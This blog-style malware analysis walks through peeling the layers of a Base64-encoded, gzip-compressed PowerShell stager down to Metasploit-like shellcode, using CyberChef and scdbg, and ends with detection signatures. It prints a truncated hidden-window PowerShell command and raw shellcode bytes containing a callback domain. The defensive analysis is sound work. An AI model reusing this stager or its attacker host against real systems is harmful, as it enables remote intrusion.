Analysing Encoded Powershell and Shellcode
Base64 encoded PowerShell commands can often be a quick win for the identification of suspicious activity. Recently, I've come across some notable samples, which after a bit of digging, provide valuable insight into attacker activities and new IOCs.
This article initially looks at a Base64 encoded PowerShell which looks like it could be Metasploit Framework Shellcode or for other frameworks such as Cobalt Strike or PowerShell Empire, which can be analyzed in a similar way.
In most cases, we can use CyberChef to create a recipe to unpeel the payload, and then something like scdbg to understand the shellcode.
The recipe for the analysis is at the end of the article.
Note, the samples are publically available online. Other samples may require slightly modified analysis, but this process generally is applicable to the latest active samples.
Example Payload
Due to the size of the payload, a snippet is shown here.
powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQ...At first glance, the payload gives little indication of what it does, but this can also be inferred to suggest that there is something suspicious due to the obfuscation.
Initial Decode
The first thing to do would be to extract the encoded blob for us to process further. This can be done with the Regular Expression module, pulling out characters a-z, A-Z, 0–9, + and /, and for strings over 30 characters in length.
[a-zA-Z0–9+/]{30,}Ensure that the Output Format is ‘List matches’ so that the blob is extracted for further analysis.
Once we have the snippet, we can decode it using the From Base64.
Sometimes there are . between characters, but we can use the Remove Null Bytes module to remove these and clean up the output.
Compression Decoding
Inspecting the output, we see another base64 encoded blob in the middle. This has some commands and arguments before it, but there are still significant indicators of base64 encoded Powershell. Repeating the same modules as before allows us to pull this again, but this time the output is illegible.
Looking closer, we can see that the output is compressed with Gzip (highlighted in image), and will require decompression.
Often, any additional obfuscation is near the encoded block. Examples I’ve seen are XOR, inflation, or gzip.
Adding the modules for Regular Expression to extract the snippet, From Base64 to decode, and Gunzip to decompress, we find some more code.
This time, there is mild obfuscation from variable names looking randomly generated, as well as another base64 string. Sometimes at this stage, there is further obfuscation through additional characters or varying capitalisation.
There are also many references within this code that may provide some indication into activities.
Shellcode Analysis
One final Regular Expression to extract the base64, and just From Base64 (with no further operations this time), brings us to an output that is pretty ineligible but there are a couple of things that can be spotted if looked at closely.
üè….`.å1Àd.P0.R..R..r(.·J&1ÿ¬<a|., ÁÏ
.ÇâòRW.R..J<.L.xãH.ÑQ.Y .Ó.I.ã:I.4..Ö1ÿ¬ÁÏ
.Ç8àuö.}ø;}$uäX.X$.Óf..K.X..Ó….Ð.D$$[[aYZQÿà__Z..ë.]hnet.hwiniThLw&.ÿÕ1ÛSSSSSh:Vy§ÿÕSSj.SShRZ..èÝ…/LWbN-ZzFSMsMYg1jVgJfHgOOer2TbTaF7UybWpXZZN-dDUlduKRruzn4hAGXuHoe55oHPw8DiTzbacW3U-eZjbhc.PhW..ÆÿÕ.ÆSh.2à.SSSWSVhëU.;ÿÕ.j
_h.3…àj.Pj.VhuF..ÿÕSSSSVh-..{ÿÕ.Àu.OuÙèR…j@h….h..@.ShX¤SåÿÕ.SS.çWh. ..SVh…âÿÕ.ÀtÏ…Ã.ÀuåXÃ_èwÿÿÿyabadaba111.hopto.org.»ðµ¢Vj.SÿÕAlternatively, include the Strings module to extract them.
The most obvious thing we see from this is a domain yabadaba111.hopto.org
The next steps on this might be to investigate the domain, but we’ll continue with the analysis here.
Continuing on with the decoded characters, we can convert this To Hex.
From my experience so far, I look out for the hexadecimal pattern fc e8 82 00 00 00 ... to identify shellcode.
To finish converting this shellcode, remove the spaces between each hex character. This can be easily done with the Find / Replace module and just find for ‘ ‘.
We have now fully decoded each layer of the base64 encoded payload down to the shellcode.
We can save this output to a file (using the save symbol), and run scdbg.exe on it to try extract any extra information.
The output clearly shows us a set of commands and addresses, directly related to network and internet connections.
There is more context around some of the strings previously identified, including a port for the domain.
Removing the layers of decoding and then understanding the shellcode exposes the malicious payload and provides insight into the attacker's activities.
Much of the output from scdbg.exe was seen in the initial analysis of the shellcode within CyberChef and being able to run Strings on it.
As an example of the value of scdbg.exe, following the same process on another sample payload shows us that sometimes valuable information is found within the processed shellcode.
Signatures
- Encoded PowerShell should be looked into initially. Indicators might include:
- Gzip is often used to obfuscate data:
- Base64 encoded (and Gzip compressed) commands starting with
H4sIAh...often indicates a codeblock for the sort of payload that needs further analysis
- Base64 encoded byte array (Byte[]) starting with
/OiCAAAAYIn...often indicates shellcode, particularly MSF.
- Shellcode converted to hex, with the hexadecimal pattern
fc e8 82 00 00 00 ...again is a strong indicator for Metasploit Framework Shellcode.
